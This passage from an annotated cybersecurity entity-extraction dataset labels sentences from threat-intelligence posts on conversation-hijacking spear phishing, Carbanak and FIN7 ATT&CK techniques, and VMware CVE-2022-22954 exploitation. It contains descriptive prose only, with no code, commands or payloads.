years.","entities":[{"id":10910,"label":"attack-pattern","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} {"id":3617,"text":"In our new research blog “FreeMilk: A Highly Targeted Spear Phishing Campaign”, our Unit 42 research team has discovered an attack campaign that takes spear phishing targeting to the next level by hijacking in-progress email conversations.","entities":[{"id":49399,"label":"identity","start_offset":84,"end_offset":105},{"id":49400,"label":"attack-pattern","start_offset":151,"end_offset":165},{"id":49401,"label":"attack-pattern","start_offset":197,"end_offset":238},{"id":49402,"label":"campaign","start_offset":131,"end_offset":139}],"relations":[{"id":791,"from_id":49402,"to_id":49400,"type":"uses"},{"id":792,"from_id":49402,"to_id":49401,"type":"uses"}],"Comments":[]} {"id":3618,"text":"While these are not broad attacks, they represent an escalation in attacker spear phishing techniques in a way that makes it even more important than ever to have a prevention framework in place.","entities":[{"id":49403,"label":"attack-pattern","start_offset":76,"end_offset":90}],"relations":[],"Comments":[]} {"id":3619,"text":" Standard phishing attacks are broad attacks that use general email messages to carry out the attacks.","entities":[{"id":49404,"label":"attack-pattern","start_offset":10,"end_offset":26}],"relations":[],"Comments":[]} {"id":3620,"text":"Standard phishing attacks aren’t personalized: they use very common themes or lures in a generalized way in conjunction with a large enough pool of targets.","entities":[{"id":49405,"label":"attack-pattern","start_offset":9,"end_offset":25}],"relations":[],"Comments":[]} {"id":3621,"text":"The idea is that by chance some percentage of the phishing emails will look legitimate enough to the recipient to be successful.","entities":[{"id":49406,"label":"attack-pattern","start_offset":50,"end_offset":65}],"relations":[],"Comments":[]} {"id":3622,"text":" Basically, standard phishing attacks rely on the law of averages for its success.","entities":[{"id":49407,"label":"attack-pattern","start_offset":21,"end_offset":37}],"relations":[],"Comments":[]} {"id":3623,"text":"As such, it’s a suitable tactic when an attacker cares less about who falls for it than how many fall for it.","entities":[],"relations":[],"Comments":[]} {"id":3624,"text":" A good example of a generalized phishing campaign is the Blank Slate Campaign we wrote about in March 2017.","entities":[{"id":49409,"label":"campaign","start_offset":58,"end_offset":78},{"id":49410,"label":"TIME","start_offset":97,"end_offset":107},{"id":49408,"label":"attack-pattern","start_offset":33,"end_offset":50}],"relations":[{"id":793,"from_id":49409,"to_id":49408,"type":"uses"}],"Comments":[]} {"id":3625,"text":"This attack campaign was so generalized that the attackers didn’t even bother with any theme or lure: they simply sent blank messages with malicious attachments for the recipient to open.","entities":[],"relations":[],"Comments":[]} {"id":3626,"text":" Spear phishing is a more refined and focused version of phishing.","entities":[{"id":10946,"label":"attack-pattern","start_offset":1,"end_offset":15},{"id":10948,"label":"attack-pattern","start_offset":57,"end_offset":65}],"relations":[],"Comments":[]} {"id":3627,"text":"Instead of using generalized themes or lures, spear phishing uses themes or lures that are in some way relevant or appropriate for the target recipient.","entities":[{"id":49411,"label":"attack-pattern","start_offset":46,"end_offset":60}],"relations":[],"Comments":[]} {"id":3628,"text":"For example, a spear phishing attack could use email messages about military exercises sent to military or government targets like we saw with our recent research into CMSTAR Trojan attacks.","entities":[{"id":10953,"label":"attack-pattern","start_offset":15,"end_offset":29},{"id":10954,"label":"malware","start_offset":168,"end_offset":174}],"relations":[{"id":794,"from_id":10954,"to_id":10953,"type":"uses"}],"Comments":[]} {"id":3629,"text":"Because the malicious email has a context for the target, he or she is more likely to trust it and open the email message and any attachments.","entities":[],"relations":[],"Comments":[]} {"id":3630,"text":" Spear phishing focuses on the quality of the theme and lure where standard phishing focuses on quantity.","entities":[{"id":49412,"label":"attack-pattern","start_offset":1,"end_offset":15},{"id":49413,"label":"attack-pattern","start_offset":76,"end_offset":84}],"relations":[],"Comments":[]} {"id":3631,"text":"Spear phishing is a suitable tactic when an attacker cares about who falls for it.","entities":[{"id":10966,"label":"attack-pattern","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} {"id":3632,"text":"Where a phishing attack campaign may send malicious emails out to thousands or tens of thousands of targets, a spear phishing campaign my send out just one malicious email to one target.","entities":[{"id":49414,"label":"attack-pattern","start_offset":8,"end_offset":23},{"id":49415,"label":"attack-pattern","start_offset":111,"end_offset":125}],"relations":[],"Comments":[]} {"id":3633,"text":"Sometimes, when that target is a high-value target this attack can also be referred to as ‘Whaling”. In our new research, our Unit 42 research team has found an attack that takes the refining of spear phishing one step further.","entities":[{"id":49418,"label":"identity","start_offset":127,"end_offset":148},{"id":49416,"label":"attack-pattern","start_offset":196,"end_offset":210}],"relations":[],"Comments":[]} {"id":3634,"text":"Rather than simply using a theme or lure that is relevant to the target, the attackers behind these attacks use an email conversation that’s in progress to carry out their attack.","entities":[],"relations":[],"Comments":[]} {"id":3635,"text":" You can see an image of how this works below in Figure 1. Figure 1 Conversation Hijacking to Deliver Malware How this works is that two users, Alice (A) and Bob (B) are carrying on an email conversation.","entities":[],"relations":[],"Comments":[]} {"id":3636,"text":"A shown in the top figure, an attacker, Charlie (C), carries out an attack that enables him to gain complete control of Alice’s email account, most likely through some form of credential theft.","entities":[],"relations":[],"Comments":[]} {"id":3637,"text":"Once Charlie has access to Alice’s email account, he then finds email conversations between Alice and Bob, his ultimate target.","entities":[],"relations":[],"Comments":[]} {"id":3638,"text":"When he finds one that is still in progress, he crafts a malicious attack email that seems to be relevant to the ongoing email conversation and sends it to Bob as shown in the bottom figure.","entities":[],"relations":[],"Comments":[]} {"id":3639,"text":"If Charlie was successful in crafting the attack email to seem legitimate enough, Bob will open the email and any attachments and the attack will succeed. Unlike phishing or even general spear phishing, this is a highly sophisticated, labor intensive, focused attack.","entities":[{"id":49420,"label":"attack-pattern","start_offset":188,"end_offset":202},{"id":49419,"label":"attack-pattern","start_offset":163,"end_offset":171}],"relations":[],"Comments":[]} {"id":3640,"text":"Carrying out a successful conversation hijacking spear phishing attack requires knowing someone that the ultimate target is communicating with, compromising that person’s account, identifying an ongoing email conversation with the ultimate target, crafting an email to appear part of that ongoing email conversation and finally sending it.","entities":[{"id":49421,"label":"attack-pattern","start_offset":49,"end_offset":63}],"relations":[],"Comments":[]} {"id":3641,"text":"Even then there’s no guarantee of success since the target may somehow recognize the attack or have sufficient prevention controls in place to prevent the attack from succeeding.","entities":[],"relations":[],"Comments":[]} {"id":3642,"text":" Given all those points, this isn’t an attack that many of us need to worry about.","entities":[],"relations":[],"Comments":[]} {"id":3643,"text":"But those out there who are in positions that might make them a high value target do need to be concerned about this.","entities":[],"relations":[],"Comments":[]} {"id":3644,"text":"Whether you’re on the board of directors for an organization, a CEO\/CFO\/CSO, entrusted with important military or political information, are a journalist, or an activist\/dissident, this is a kind of attack that you could face.","entities":[],"relations":[],"Comments":[]} {"id":3645,"text":"And like with all targeted attacks, you don’t have to be the ultimate target of the attack campaign to be a target: this is a tactic that can be used as part of a broader attack campaign.","entities":[],"relations":[],"Comments":[]} {"id":3646,"text":"For example, if you are the executive assistant for a CEO, you could be the target of an attack like this (“Bob” in our scenario above) so that you in turn are used to carry out an attack (“Alice” in our scenario above) against your CEO (who then becomes “Bob” in our scenario above). Because of the nature of the attack, unless you verify each and every email you receive, it’s unlikely that you’ll necessarily be able to spot and thwart an attack.","entities":[],"relations":[],"Comments":[]} {"id":3647,"text":"In this case, your best means of protection lies in prevention.","entities":[],"relations":[],"Comments":[]} {"id":3648,"text":"And prevention here is really focused on two things.","entities":[],"relations":[],"Comments":[]} {"id":3649,"text":"First, keeping your systems and devices fully up-to-date with the latest software and security updates.","entities":[],"relations":[],"Comments":[]} {"id":3650,"text":"The specific attack our Unit 42 research team has seen using this technique relied on an attack against a vulnerability in Microsoft Office for which a patch is available.","entities":[{"id":49422,"label":"identity","start_offset":24,"end_offset":45},{"id":49423,"label":"SOFTWARE","start_offset":123,"end_offset":139}],"relations":[],"Comments":[]} {"id":3651,"text":"If an attacker tried to carry this attack out against a target that was patched for this vulnerability, it would fail.","entities":[],"relations":[],"Comments":[]} {"id":3652,"text":" Second, using security on your systems, devices and networks that provides multiple layers of protection can help prevent attacks. Conversation hijacking spear phishing isn’t a threat everyone faces, but for those who do it represents a significant escalation in terms of sophistication and social engineering of spear phishing attacks.","entities":[{"id":49426,"label":"attack-pattern","start_offset":315,"end_offset":329},{"id":49424,"label":"attack-pattern","start_offset":156,"end_offset":170},{"id":49425,"label":"attack-pattern","start_offset":293,"end_offset":311}],"relations":[],"Comments":[]} {"id":3653,"text":"It also takes spear phishing attacks to a level that makes it nearly impossible to distinguish an attack email from a legitimate email.","entities":[{"id":11070,"label":"attack-pattern","start_offset":14,"end_offset":28}],"relations":[],"Comments":[]} {"id":3654,"text":"And so technological prevention controls (patching, robust security) are even more for effective prevention.","entities":[],"relations":[],"Comments":[]} {"id":3655,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":3656,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":3657,"text":"Constant monitoring of threat groups is one of the ways that security researchers and law enforcement agencies are able defend systems against cybercrime.","entities":[],"relations":[],"Comments":[]} {"id":3658,"text":"Among these cybercriminals are financially motivated threat groups Carbanak and FIN7.","entities":[{"id":49428,"label":"threat-actor","start_offset":80,"end_offset":84},{"id":49427,"label":"threat-actor","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} {"id":3659,"text":"Although both names have at times been used to refer to the same group, organizations such as MITRE identifies them as two separate entities that wield the Carbanak backdoor in their attacks.","entities":[{"id":49429,"label":"identity","start_offset":94,"end_offset":99},{"id":49432,"label":"malware","start_offset":156,"end_offset":173}],"relations":[],"Comments":[]} {"id":3660,"text":"However, the groups use not just the Carbanak backdoor but also other types of malware such as Pillowmint, a point-of-sale malware, and Tirion, which is said to be geared to replace Carbanak.","entities":[{"id":49434,"label":"malware","start_offset":136,"end_offset":142},{"id":49431,"label":"malware","start_offset":37,"end_offset":55},{"id":49433,"label":"malware","start_offset":95,"end_offset":105},{"id":49435,"label":"malware","start_offset":182,"end_offset":190}],"relations":[],"Comments":[]} {"id":3661,"text":"MITRE also identifies different main targets for each group: While Carbanak focuses on banking institutions, FIN7 targets food, hospitality, and retail establishments.","entities":[{"id":49437,"label":"threat-actor","start_offset":67,"end_offset":75},{"id":49438,"label":"threat-actor","start_offset":109,"end_offset":113},{"id":49436,"label":"identity","start_offset":0,"end_offset":5},{"id":49439,"label":"identity","start_offset":87,"end_offset":107},{"id":49440,"label":"identity","start_offset":122,"end_offset":166}],"relations":[{"id":795,"from_id":49437,"to_id":49439,"type":"targets"},{"id":796,"from_id":49438,"to_id":49440,"type":"targets"}],"Comments":[]} {"id":3662,"text":"This week, the results of this year's round of the MITRE Engenuity ATT&CK Evaluations were released, which focused on Carbanak+FIN7.","entities":[{"id":49441,"label":"identity","start_offset":51,"end_offset":73},{"id":49442,"label":"threat-actor","start_offset":118,"end_offset":126},{"id":49443,"label":"threat-actor","start_offset":127,"end_offset":131}],"relations":[],"Comments":[]} {"id":3663,"text":"We also separately discussed how Trend Micro solutions deal with these threats.","entities":[{"id":49444,"label":"identity","start_offset":33,"end_offset":44}],"relations":[],"Comments":[]} {"id":3664,"text":"For more background on what happens in attacks launched by Carbanak and FIN7, we pieced together information from our studies of these groups as well as information from ATT&CK tactics and techniques (a total of 65 techniques across 11 tactics) identified by MITRE to be related to these threat groups.","entities":[{"id":49446,"label":"threat-actor","start_offset":72,"end_offset":76},{"id":49445,"label":"threat-actor","start_offset":59,"end_offset":67},{"id":49447,"label":"identity","start_offset":259,"end_offset":264}],"relations":[],"Comments":[]} {"id":3665,"text":"What happens in Carbanak and FIN7 attacks?","entities":[{"id":49448,"label":"threat-actor","start_offset":16,"end_offset":24},{"id":49449,"label":"threat-actor","start_offset":29,"end_offset":33}],"relations":[],"Comments":[]} {"id":3666,"text":"In our analysis of a related past campaign, we observed that attackers enter the system through spear phishing.","entities":[{"id":49450,"label":"attack-pattern","start_offset":96,"end_offset":110}],"relations":[],"Comments":[]} {"id":3667,"text":"After gaining a foothold in the system, the dynamic data exchange (DDE) feature in Windows and legitimate cloud-based services will then be abused to deliver the malware or to establish command-and-control (C&C) communication.","entities":[{"id":49451,"label":"SOFTWARE","start_offset":83,"end_offset":90}],"relations":[],"Comments":[]} {"id":3668,"text":"After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic.","entities":[{"id":49452,"label":"malware","start_offset":16,"end_offset":33},{"id":49453,"label":"attack-pattern","start_offset":54,"end_offset":68},{"id":49456,"label":"attack-pattern","start_offset":120,"end_offset":150},{"id":49457,"label":"attack-pattern","start_offset":156,"end_offset":179},{"id":49455,"label":"attack-pattern","start_offset":94,"end_offset":118},{"id":49454,"label":"attack-pattern","start_offset":73,"end_offset":92}],"relations":[{"id":797,"from_id":49452,"to_id":49453,"type":"uses"},{"id":798,"from_id":49452,"to_id":49454,"type":"uses"},{"id":799,"from_id":49452,"to_id":49455,"type":"uses"},{"id":800,"from_id":49452,"to_id":49456,"type":"uses"},{"id":801,"from_id":49452,"to_id":49457,"type":"uses"}],"Comments":[]} {"id":3669,"text":"For lateral movement, the malware abuses remote and system administration tools.","entities":[{"id":49458,"label":"attack-pattern","start_offset":4,"end_offset":20},{"id":49459,"label":"attack-pattern","start_offset":34,"end_offset":79}],"relations":[],"Comments":[]} {"id":3670,"text":"To be more specific in terms of ATT&CK® techniques, Carbanak and FIN7 share a notable number of similarities.","entities":[{"id":49461,"label":"threat-actor","start_offset":65,"end_offset":69},{"id":49460,"label":"threat-actor","start_offset":52,"end_offset":60}],"relations":[{"id":802,"from_id":49460,"to_id":49461,"type":"related-to"}],"Comments":[]} {"id":3671,"text":"However, some techniques are only used by one of them, as we discuss in the subsequent sections.","entities":[],"relations":[],"Comments":[]} {"id":3672,"text":" Figure 1. ATT&CK® tactics shared between Carbanak and FIN7 The following are the tactics and techniques that are employed by Carbanak and FIN7, as shared by MITRE.","entities":[{"id":49464,"label":"threat-actor","start_offset":135,"end_offset":143},{"id":49465,"label":"threat-actor","start_offset":148,"end_offset":152},{"id":49462,"label":"threat-actor","start_offset":46,"end_offset":54},{"id":49463,"label":"threat-actor","start_offset":59,"end_offset":63},{"id":49466,"label":"identity","start_offset":167,"end_offset":172}],"relations":[],"Comments":[]} {"id":3673,"text":"Initial Access","entities":[],"relations":[],"Comments":[]} {"id":3674,"text":"Both groups use spear-phishing campaigns with attachments that are embedded with exploits as an entry point to the target system.","entities":[{"id":49467,"label":"attack-pattern","start_offset":16,"end_offset":40}],"relations":[],"Comments":[]} {"id":3675,"text":"Execution","entities":[],"relations":[],"Comments":[]} {"id":3676,"text":"Successfully entering the system leads to the next step: executing the attack.","entities":[],"relations":[],"Comments":[]} {"id":3677,"text":"For code and behavior execution, both groups use a variety of techniques through native API, PowerShell, service execution, user execution, Windows Component Object Model (COM) and Distributed COM, and Windows Management Instrumentation (WMI).","entities":[{"id":49468,"label":"tools","start_offset":93,"end_offset":103},{"id":49471,"label":"attack-pattern","start_offset":141,"end_offset":242},{"id":49469,"label":"attack-pattern","start_offset":105,"end_offset":122},{"id":49470,"label":"attack-pattern","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} {"id":3678,"text":"Carbanak also abuses command-line interface and DDE client-server protocol.","entities":[{"id":49472,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":3679,"text":"On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems.","entities":[{"id":49473,"label":"threat-actor","start_offset":19,"end_offset":23},{"id":49474,"label":"tools","start_offset":43,"end_offset":48},{"id":49475,"label":"attack-pattern","start_offset":110,"end_offset":128}],"relations":[],"Comments":[]} {"id":3680,"text":"Persistence","entities":[],"relations":[],"Comments":[]} {"id":3681,"text":"Once the malicious behavior is executed, the attackers will attempt to keep their presence in a system.","entities":[],"relations":[],"Comments":[]} {"id":3682,"text":"To maintain persistence, the groups create new services.","entities":[],"relations":[],"Comments":[]} {"id":3683,"text":"They also add programs to a startup folder that can be referenced with a registry run key.","entities":[],"relations":[],"Comments":[]} {"id":3684,"text":"We detected a variant of the Carbanak malware that adds registry entries and keys as an autostart technique.","entities":[{"id":49477,"label":"malware","start_offset":29,"end_offset":45},{"id":49479,"label":"attack-pattern","start_offset":51,"end_offset":107}],"relations":[{"id":803,"from_id":49477,"to_id":49479,"type":"uses"}],"Comments":[]} {"id":3685,"text":"Credentials of existing valid accounts were also abused.","entities":[],"relations":[],"Comments":[]} {"id":3686,"text":"In the case of FIN7, the use of application shimming databases (which can allow developers to apply fixes to applications without rewriting code) and hooking processes that allow the modification of program behaviors are some of the techniques that can be applied.","entities":[{"id":49480,"label":"threat-actor","start_offset":15,"end_offset":19}],"relations":[],"Comments":[]} {"id":3687,"text":"The former has been utilized in a campaign involving the Pillowmint malware.","entities":[{"id":49481,"label":"malware","start_offset":57,"end_offset":75}],"relations":[],"Comments":[]} {"id":3688,"text":"Privilege Escalation","entities":[{"id":11194,"label":"attack-pattern","start_offset":0,"end_offset":20}],"relations":[],"Comments":[]} {"id":3689,"text":"Some functions that are needed for the attack require admin privileges.","entities":[],"relations":[],"Comments":[]} {"id":3690,"text":"To elevate privileges, the groups bypass Windows User Account Control (UAC) mechanisms, new services, and valid accounts to elevate process privileges.","entities":[{"id":49482,"label":"attack-pattern","start_offset":34,"end_offset":75}],"relations":[],"Comments":[]} {"id":3691,"text":"For the same purpose, on Linux systems, Carbanak attacks can use sudo, a program that permits users to execute the programs of a superuser.","entities":[{"id":49483,"label":"threat-actor","start_offset":40,"end_offset":48}],"relations":[],"Comments":[]} {"id":3692,"text":"FIN7 attacks can and inject code into processes and hijack the search order used to load DLL files.","entities":[{"id":49484,"label":"threat-actor","start_offset":0,"end_offset":4},{"id":49485,"label":"attack-pattern","start_offset":21,"end_offset":32},{"id":49486,"label":"attack-pattern","start_offset":52,"end_offset":98}],"relations":[{"id":804,"from_id":49484,"to_id":49485,"type":"uses"},{"id":805,"from_id":49484,"to_id":49486,"type":"uses"}],"Comments":[]} {"id":3693,"text":"Defense Evasion","entities":[],"relations":[],"Comments":[]} {"id":3694,"text":"After a series of malicious behavior, attackers need to remain stealthy and undetected by using security solutions that can remove threats out of the system.","entities":[],"relations":[],"Comments":[]} {"id":3695,"text":"For defense evasion, both groups create or acquire tools for code signing the malware, or deobfuscate or decode files or information by using malware functions or utilities in the system.","entities":[],"relations":[],"Comments":[]} {"id":3696,"text":"Both groups also employ masquerading to make features appear benign to security solutions, files or information obfuscation to make these files and information difficult to discover, software packing to conceal code, and process injection to evade process-based defense.","entities":[{"id":49487,"label":"attack-pattern","start_offset":24,"end_offset":36},{"id":49488,"label":"attack-pattern","start_offset":221,"end_offset":238},{"id":49490,"label":"attack-pattern","start_offset":183,"end_offset":199},{"id":49489,"label":"attack-pattern","start_offset":91,"end_offset":123}],"relations":[],"Comments":[]} {"id":3697,"text":"Carbanak also performs techniques for disabling security tools, deleting files that are left in malicious activity, and modifying registry to hide configuration information.","entities":[{"id":49494,"label":"attack-pattern","start_offset":120,"end_offset":138},{"id":49493,"label":"attack-pattern","start_offset":64,"end_offset":78},{"id":49491,"label":"attack-pattern","start_offset":38,"end_offset":62},{"id":49492,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[{"id":806,"from_id":49492,"to_id":49491,"type":"uses"},{"id":807,"from_id":49492,"to_id":49493,"type":"uses"},{"id":808,"from_id":49492,"to_id":49494,"type":"uses"}],"Comments":[]} {"id":3698,"text":"FIN7 utilizes guardrails to restrict execution and abused utilities that allow indirect command execution that can go past security restrictions.","entities":[{"id":49495,"label":"attack-pattern","start_offset":79,"end_offset":105},{"id":49496,"label":"threat-actor","start_offset":0,"end_offset":4},{"id":49497,"label":"tools","start_offset":14,"end_offset":24}],"relations":[{"id":809,"from_id":49496,"to_id":49497,"type":"uses"},{"id":810,"from_id":49496,"to_id":49495,"type":"uses"}],"Comments":[]} {"id":3699,"text":"The group also evades virtualization and sandboxes and injects malicious code into hollowed processes to dodge process-based defenses.","entities":[{"id":49498,"label":"attack-pattern","start_offset":15,"end_offset":50},{"id":49499,"label":"attack-pattern","start_offset":56,"end_offset":77}],"relations":[],"Comments":[]} {"id":3700,"text":"Credential Access","entities":[],"relations":[],"Comments":[]} {"id":3701,"text":"Some portions of the system are protected by credentials.","entities":[],"relations":[],"Comments":[]} {"id":3702,"text":"To steal these, both groups employed credential dumping and input capture.","entities":[{"id":11230,"label":"attack-pattern","start_offset":37,"end_offset":55},{"id":11232,"label":"attack-pattern","start_offset":60,"end_offset":73}],"relations":[],"Comments":[]} {"id":3703,"text":"The former involves credentials that are usually in the form of hash or clear text, while the latter involves API or web portals.","entities":[],"relations":[],"Comments":[]} {"id":3704,"text":"Carbanak also performs brute force tactics or takes advantage of credentials that are saved in web browsers.","entities":[{"id":11236,"label":"attack-pattern","start_offset":23,"end_offset":34}],"relations":[],"Comments":[]} {"id":3705,"text":"On the other hand, FIN7 performs hooking.","entities":[{"id":11240,"label":"attack-pattern","start_offset":33,"end_offset":40},{"id":49500,"label":"threat-actor","start_offset":19,"end_offset":23}],"relations":[{"id":811,"from_id":49500,"to_id":11240,"type":"uses"}],"Comments":[]} {"id":3706,"text":"Discovery","entities":[],"relations":[],"Comments":[]} {"id":3707,"text":"For the discovery phase, the Carbanak and FIN7 campaigns gain more knowledge about the system by gathering listings of various information: open application windows, running processes, IP addresses and other network identifiers in remote systems, detailed hardware and system information, system network configuration and settings, and system owners and users.","entities":[{"id":49502,"label":"threat-actor","start_offset":42,"end_offset":46},{"id":49501,"label":"threat-actor","start_offset":29,"end_offset":37}],"relations":[],"Comments":[]} {"id":3708,"text":"Carbanak also collects information on accounts, files and directories, group permissions, and registries.","entities":[{"id":49503,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":3709,"text":"FIN7 gathers information on network shares.","entities":[{"id":49504,"label":"threat-actor","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} {"id":3710,"text":"The gathered information can aid in the next step: lateral movement.","entities":[{"id":49505,"label":"attack-pattern","start_offset":51,"end_offset":67}],"relations":[],"Comments":[]} {"id":3711,"text":"Lateral Movement","entities":[{"id":49506,"label":"attack-pattern","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} {"id":3712,"text":"The groups move through the network and identify key assets and data by logging in via RDP, copying files to upload adversary tools through remote file copy, and abusing Window admin shares.","entities":[{"id":49508,"label":"attack-pattern","start_offset":162,"end_offset":189},{"id":49507,"label":"attack-pattern","start_offset":140,"end_offset":156}],"relations":[],"Comments":[]} {"id":3713,"text":"In Carbanak attacks, the groups’ attacks can involve logging into services that accept remote connections and using stolen password hashes through the “pass the hash” method.","entities":[{"id":49509,"label":"attack-pattern","start_offset":152,"end_offset":165},{"id":49510,"label":"threat-actor","start_offset":3,"end_offset":11},{"id":49511,"label":"attack-pattern","start_offset":110,"end_offset":138}],"relations":[{"id":812,"from_id":49510,"to_id":49511,"type":"uses"},{"id":813,"from_id":49510,"to_id":49509,"type":"uses"}],"Comments":[]} {"id":3714,"text":"Collection","entities":[],"relations":[],"Comments":[]} {"id":3715,"text":"After moving through the network and identifying assets to target, the next step would be to gather key data.","entities":[],"relations":[],"Comments":[]} {"id":3716,"text":"At the collection phase, Carbanak and FIN7 campaigns harvest data from local system sources and through input and screen capture (as performed in a related campaign using the Tirion malware).","entities":[{"id":49515,"label":"attack-pattern","start_offset":53,"end_offset":91},{"id":49516,"label":"attack-pattern","start_offset":114,"end_offset":128},{"id":49512,"label":"threat-actor","start_offset":25,"end_offset":33},{"id":49513,"label":"threat-actor","start_offset":38,"end_offset":42},{"id":49514,"label":"malware","start_offset":175,"end_offset":189}],"relations":[{"id":814,"from_id":49512,"to_id":49513,"type":"related-to"},{"id":815,"from_id":49512,"to_id":49515,"type":"uses"},{"id":816,"from_id":49512,"to_id":49516,"type":"uses"}],"Comments":[]} {"id":3717,"text":"FIN7 attacks can stage collected data in a particular location in preparation for exfiltration.","entities":[{"id":49517,"label":"threat-actor","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} {"id":3718,"text":"Command and Control","entities":[],"relations":[],"Comments":[]} {"id":3719,"text":"In both Carbanak and FIN7 attacks, communication with users’ compromised systems is done through bypassing firewalls or network detection systems via commonly used ports, using connection proxies to avoid direct connections to the threat group’s infrastructure, employing the command-and-control channel to remotely copy files from an external system, blending in with existing network traffic by using standard application layer protocol, and taking advantage of standard cryptographic protocol to disguise command-and-control traffic.","entities":[{"id":49518,"label":"threat-actor","start_offset":8,"end_offset":16},{"id":49519,"label":"threat-actor","start_offset":21,"end_offset":25},{"id":49520,"label":"attack-pattern","start_offset":97,"end_offset":116},{"id":49521,"label":"attack-pattern","start_offset":171,"end_offset":195},{"id":49522,"label":"attack-pattern","start_offset":352,"end_offset":393}],"relations":[{"id":817,"from_id":49518,"to_id":49519,"type":"related-to"},{"id":818,"from_id":49519,"to_id":49520,"type":"uses"},{"id":819,"from_id":49519,"to_id":49521,"type":"uses"},{"id":820,"from_id":49519,"to_id":49522,"type":"uses"}],"Comments":[]} {"id":3720,"text":"Carbanak campaigns can also use legitimate programs and remote access software for command and control.","entities":[{"id":49523,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":3721,"text":"They also employ standard non-application layer protocols for communication.","entities":[],"relations":[],"Comments":[]} {"id":3722,"text":"Exfiltration","entities":[],"relations":[],"Comments":[]} {"id":3723,"text":"In the final phase of the attack, the groups exfiltrate the stolen data into the normal communications channel via command-and-control channels.","entities":[],"relations":[],"Comments":[]} {"id":3724,"text":"For FIN7 attack routines, data can be compressed and\/or encrypted before being exfiltrated.","entities":[{"id":49524,"label":"threat-actor","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} {"id":3725,"text":"ATT&CK® tactics and techniques for Linux were also shared by MITRE.","entities":[{"id":49525,"label":"identity","start_offset":61,"end_offset":66},{"id":49526,"label":"SOFTWARE","start_offset":35,"end_offset":40}],"relations":[],"Comments":[]} {"id":3726,"text":"Continuous vigilance against threat groups is an important aspect of keeping up with — if not being one step ahead of — threats.","entities":[],"relations":[],"Comments":[]} {"id":3727,"text":"Solutions such as Trend Micro Vision One™️ provide visibility, correlated detection, and behavior monitoring across multiple layers: email, endpoints, servers, cloud workloads.","entities":[{"id":49527,"label":"SOFTWARE","start_offset":18,"end_offset":40}],"relations":[],"Comments":[]} {"id":3728,"text":" Tags Endpoints | APT & Targeted Attacks | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":3729,"text":"This post is also available in: 日本語 (Japanese) ","entities":[],"relations":[],"Comments":[]} {"id":3730,"text":"On April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and vRealize Automation.","entities":[{"id":49530,"label":"vulnerability","start_offset":99,"end_offset":113},{"id":49531,"label":"vulnerability","start_offset":118,"end_offset":132},{"id":49533,"label":"SOFTWARE","start_offset":187,"end_offset":203},{"id":49534,"label":"SOFTWARE","start_offset":208,"end_offset":227},{"id":49532,"label":"SOFTWARE","start_offset":158,"end_offset":185},{"id":49528,"label":"TIME","start_offset":3,"end_offset":16},{"id":49529,"label":"identity","start_offset":18,"end_offset":24}],"relations":[{"id":821,"from_id":49532,"to_id":49530,"type":"has"},{"id":822,"from_id":49532,"to_id":49531,"type":"has"},{"id":823,"from_id":49533,"to_id":49530,"type":"has"},{"id":824,"from_id":49533,"to_id":49531,"type":"has"},{"id":825,"from_id":49534,"to_id":49530,"type":"has"},{"id":826,"from_id":49534,"to_id":49531,"type":"has"}],"Comments":[]} {"id":3731,"text":"On April 13, they updated their advisory with information that CVE-2022-22954 is being exploited in the wild.","entities":[{"id":49535,"label":"vulnerability","start_offset":63,"end_offset":77},{"id":49536,"label":"TIME","start_offset":3,"end_offset":11}],"relations":[],"Comments":[]} {"id":3732,"text":" Multiple writeups detailing exploitation scenarios for the aforementioned two vulnerabilities were published in the last week of April, finally followed by a CISA Alert on May 18.","entities":[{"id":49537,"label":"TIME","start_offset":117,"end_offset":135},{"id":49538,"label":"identity","start_offset":159,"end_offset":163},{"id":49539,"label":"TIME","start_offset":173,"end_offset":179}],"relations":[],"Comments":[]} {"id":3733,"text":"The CISA Alert also calls out CVE-2022-22972 and CVE-2022-22973 – published on the same day and affecting the same products – as being highly likely to be exploited.","entities":[{"id":49540,"label":"identity","start_offset":4,"end_offset":8},{"id":49542,"label":"vulnerability","start_offset":49,"end_offset":63},{"id":49541,"label":"vulnerability","start_offset":30,"end_offset":44}],"relations":[],"Comments":[]} {"id":3734,"text":" Unit 42 has observed numerous instances of CVE-2022-22954 being exploited in the wild.","entities":[{"id":11330,"label":"identity","start_offset":1,"end_offset":8},{"id":49543,"label":"vulnerability","start_offset":44,"end_offset":58}],"relations":[],"Comments":[]} {"id":3735,"text":"In this blog post, we share context around this observed activity, along with how the Palo Alto Networks product suite can be leveraged to protect against it.","entities":[{"id":49544,"label":"identity","start_offset":86,"end_offset":104}],"relations":[],"Comments":[]} {"id":3736,"text":"Timeline for VMware Vulnerabilities CVE-2022-22954 in the Wild Direct Downloads Mirai\/Gafgyt Dropper Scripts or Variants Webshells Perl Shellbot Base64 Injections SSH Key Targeting CVE-2022-22960 in the Wild Conclusion Indicators of 